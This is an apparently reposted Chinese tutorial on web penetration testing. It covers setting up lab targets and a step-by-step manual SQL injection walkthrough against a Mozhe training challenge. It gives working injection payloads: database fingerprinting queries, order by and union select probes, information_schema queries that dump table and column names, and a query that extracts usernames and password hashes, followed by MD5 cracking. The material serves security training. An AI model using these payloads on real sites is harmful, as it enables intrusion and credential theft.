您现在的位置是:首页» windows系统» web安全渗透测试题,Web安全渗透测试

web安全渗透测试题,Web安全渗透测试

2024-07-13 02:58:40
本内容由系统网小编为大家分享,Windows系统安装教程、办公系统、软件怎么使用、软件使用教程、办公软件攻略等信息。忍者测试系统的安装:忍者安全渗透系统(NINJITSU OS V3)的安装详细过程,亲测新旧vm版本都可安装,附带下载来源_

本内容由系统网小编为大家分享,Windows系统安装教程、办公系统、软件怎么使用、软件使用教程、办公软件攻略等信息。

忍者测试系统的安装:

忍者安全渗透系统(NINJITSU OS V3)的安装详细过程,亲测新旧vm版本都可安装,附带下载来源_黑色地带(崛起)的博客-CSDN博客

靶场环境搭建:

①phpstudy以及pikachu-master环境搭建

新版phpstudy搭建pikachu靶场环境详细过程_黑色地带(崛起)的博客-CSDN博客

②sqli-labs-master靶场环境搭建

详细新版phpstudy安装以及sqli-labs-master靶场环境搭建过程附带文件链接_黑色地带(崛起)的博客-CSDN博客

③hackbar的安装

安装hackbar,火狐2分钟解决(优选),及如何打开使用_黑色地带(崛起)的博客-CSDN博客

可能出现的问题:

①pikachu可能出现的问题:

“数据库连接失败,请检查config.inc.php配置文件”常见2种可能错误_黑色地带(崛起)的博客-CSDN博客

②sqli-labs-master可能出现的问题:

sqli-labs出现“Fatal error:Uncaught Error”的解决办法_黑色地带(崛起)的博客-CSDN博客

sqli-labs出现“Unable to connect to the database: security”问题(phpstudy搭建)_黑色地带(崛起)的博客-CSDN博客

信息收集

测试前的准备:

1.网站路径

burpsuite或者sqlmap进行网站爬取

直接使用kali Linux等渗透系统中sqlmap,简单的使用入门_黑色地带(崛起)的博客-CSDN博客

2.操作系统:

windows和linux对大小写敏感不同,大小写都不报错的是windows

3.数据库类型判断:

方法一:

在开发者工具里面分析数据包的头部文件

发现是Nginx

方法二:

根据前端编写判断

asp:  SQL Server,Access.net:  SQL Serverphp:  MySQL,PostgreSQLjava:  Oracle,MySQL

方法三:

扫描端口判断

Oracle:默认端口1521SQL Server:默认端口1433MySQL:默认端口3306

Pointbase:默认是9092

DB2:默认是5000

没扫出来

方法四:

根据各种数据库特有函数进行判读

/*是MySQL数据库的注释符 --是Oracle和SQL Server支持的注释符 ;是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库 #是MySQL中的注释符,返回错误则说明可能不是MySQL,也支持-- 和/**/

方法五:

存在注入点的条件下,根据数据库特有数据表判断

①MySQL(version>5.0)

插入    and (select count(*) from information_schema.TABLES)>0 and 1=1

②Oracle

插入  and (select count(*) from sys.user_tables)>0 and 1=1

③SQL Server

插入  and (select count(*) from sysobjects)>0 and 1=1

4.数据库版本:

查看数据头来查看数据库及其版本(有的可能屏蔽了看不见)

判断是否有注入点:

方法一:

id是最普遍的,基本上所有表都会有这个字段

在后面加上?id=1

如果输出id=1的相关信息,则说明变量没有过滤,或者过滤不严谨

没做过滤,或过滤不严谨(下图未过滤)

方法二:

加上单引号'

如果出现错误提示,则可能存在注入漏洞(可能)

方法三:

用数据库逻辑运算来判断(有传入参数的时候用)

and 1=1 页面访问正常       得出  真且真为真

​ and 1=2页面访问错误     得出  真且假为假

​ 所以说明我们的语句写进去了,可能存在注入点

(下图未做任何不法行为)

and 1=1  和id1=2 都能正常显示页面,说明没有被写入

(还有其他方法,一步一步总结)

墨者题库:

第一步:

判断是否有注入点

(注意:?id=1要换到第二行)

and1=1 正常显示

and 1=2 无法正常显示

所以存在注入点

第二步:

猜测字段数

①order by (number)

②union select 1,2……

方法一:

后面的数字一个一个猜

order by 5    无显示

order by 4  (正常显示出来了,说明有4个)

方法二:

(重申:这个?id=1 要拿到第二行)

union select 1,2,3,4,5

union select 1,2,3,4

第三步:

报错猜解可显示字段

(重申:改为 ?id=-1  且放到第二行)

?id=-1 select 1,2,3,4   (这个-1可以随便写成任意不可能的数)

得到可显示字段为2个,为2,3

第四步:

获取数据库相关信息

数据库版本:version()

数据库名字:database()

数据库用户:user()

?id=-1 union select 1,version(),database(),4#

(#或--+把后面的语句注释了)

第五步:

获取数据库下信息

借助information_schema

information_schema.tables 所有表名

information_schema.columns 所有的列名

table_name #表名

column_name #列名

table_schema #数据库名

查询数据库所下的表名

?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'#

查询StormGroup_member表下列名

?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member'

?id=-1 union select 1,name,password,4 from StormGroup_member where status=1#

第六步:

解密

开启靶机的时候,就提示掌握cmd5加解密(有一个信息的提醒)

md5在线解密破解,md5解密加密 (cmd5.com)

mozhe

552761

第七步:

登录得到key

XTw.com.Cn系统网专业应用软件下载教程,免费windows10系统,win11,办公软件,OA办公系统,OA软件,办公自动化软件,开源系统,移动办公软件等信息,解决一体化的办公方案。

免责声明:本文中引用的各种信息及资料(包括但不限于文字、数据、图表及超链接等)均来源于该信息及资料的相关主体(包括但不限于公司、媒体、协会等机构)的官方网站或公开发表的信息。内容仅供参考使用,不准确地方联系删除处理!

联系邮箱:773537036@qq.com

标签: web